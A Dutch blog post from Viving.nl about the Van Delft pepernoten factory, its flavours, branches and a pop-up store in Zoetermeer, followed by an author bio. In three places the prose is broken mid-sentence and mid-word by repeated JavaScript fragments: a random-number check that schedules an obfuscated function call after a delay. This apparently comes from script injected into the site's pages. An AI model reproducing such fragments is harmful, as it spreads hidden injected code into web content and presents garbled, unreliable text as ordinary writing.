De pepernotenfabriek van ‘Van Delft’ is geopend!

Als je van pepernoten houdt, ben je bij pepernotenfabriek ‘Van Delft’ aan het juiste adres. Meer dan 50 soorten pepernoten in allerlei smaken en kleuren. Truffel, limoncello, stroopwafel, kaneel, steranijs en zelfs pepernoten die naar zure matten smaken. 

Van Delft uit Harderwijk is al sinds 1880 ‘hofleverancier van Sinterklaas’ als het om de productie van pepernoten gaat. Maarliefst 7 van de 10 verkochte zakken pepernoten zijn door Van Delft geproduceerd en daarmee zijn ze de grootste en tevens oudste pepernotenfabriek ter wereld.

De afgelopen jaren hebben ze diverse luxe pepernoten op de markt gebracht en ook dit jaar hebben ze een nieuwe soort dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegevoegd; roomboter kruidnoten volgens oud recept.

De pepernotenfabriek heeft 16 vestigingen door heel Nederland een vestiging in Berlijn én zelfs een webshop! Zelf heb ik de pop-up Sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore in het Stadshart van Zoetermeer bezocht. Een groot feest om te zien en onmogelijk om met lege handen naar huis te gaan. Ik ging naar huis met de smaken caramel zeezout, limoncello en de roomboter kruidnoten en ze zijn 100% goedgekeurd. Jammer alleen dat ze zo snel op zijn… Gelukkig blijft de winkel nog dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot het eind van het jaar staan. Genoeg tijd om alle smaken uit te proberen!

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "De pepernotenfabriek van 'Van Delft' is geopend!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.